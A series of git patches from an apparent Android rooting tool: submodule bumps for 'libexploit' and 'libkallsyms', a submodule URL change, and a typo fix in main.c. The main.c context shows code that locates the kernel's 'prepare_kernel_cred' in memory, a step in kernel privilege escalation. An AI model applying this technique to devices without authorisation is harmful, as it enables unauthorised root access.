ff8ded79aa48d9bb8acc76a5599313aa3a4b0f9d From 5e7aa1add0749228c4c9454b8c3cc0a4855e9503 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 7 Oct 2015 23:26:00 +0900 Subject: [PATCH 122/125] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index 5faee5e..e62df1f 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 5faee5ece8afd04dcfea93ddd6800431851db9f9 +Subproject commit e62df1fc5d68dfe4bd71807cc9b527e5e7ee9c64 From 40f9028303e48e16ba8853f62d5c0cf700d72a19 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 22 Nov 2015 14:46:57 +0900 Subject: [PATCH 123/125] Update submodule --- libexploit | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/libexploit b/libexploit index e62df1f..e919a58 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit e62df1fc5d68dfe4bd71807cc9b527e5e7ee9c64 +Subproject commit e919a586bb8ea486839364b1ba933ac21173c674 diff --git a/libkallsyms b/libkallsyms index ff8ded7..aa38ae7 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit ff8ded79aa48d9bb8acc76a5599313aa3a4b0f9d +Subproject commit aa38ae78145724a2a330c1bab620cf3df7c3f6ad From c6ff7701357c3aa1047cfd3c69f67249014181f7 Mon Sep 17 00:00:00 2001 From: Richard Sartor Date: Thu, 10 Mar 2016 12:36:33 -0600 Subject: [PATCH 124/125] Use a publicly accessible url for the submodule. Outside contributors without `git://` access to the android_device_database repo get a fatal error when trying to clone the repo. Changing the access method to `https://` makes it possible for these user to clone the repo and all its submodules. --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index d56e434..0a93234 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,6 @@ [submodule "device_database"] path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git + url = https://github.com/android-rooting-tools/android_device_database.git [submodule "libkallsyms"] path = libkallsyms url = https://github.com/android-rooting-tools/libkallsyms.git From 652baca8586996630343a074aca24cbd653282a9 Mon Sep 17 00:00:00 2001 From: Eunchan Date: Tue, 8 Nov 2016 11:07:20 +0900 Subject: [PATCH 125/125] Fixed two typos --- main.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/main.c b/main.c index 7ea6ff7..cce59ff 100644 --- a/main.c +++ b/main.c @@ -264,11 +264,11 @@ bool find_variables_in_memory(void *mem, size_t length) { kallsyms *info; - printf("Search address in memroy...\n"); + printf("Search address in memory...\n"); info = kallsyms_in_memory_init(mem, length); if (info) { - printf("Using kallsyms_in_memroy...\n"); + printf("Using kallsyms_in_memory...\n"); if (!prepare_kernel_cred) { prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred");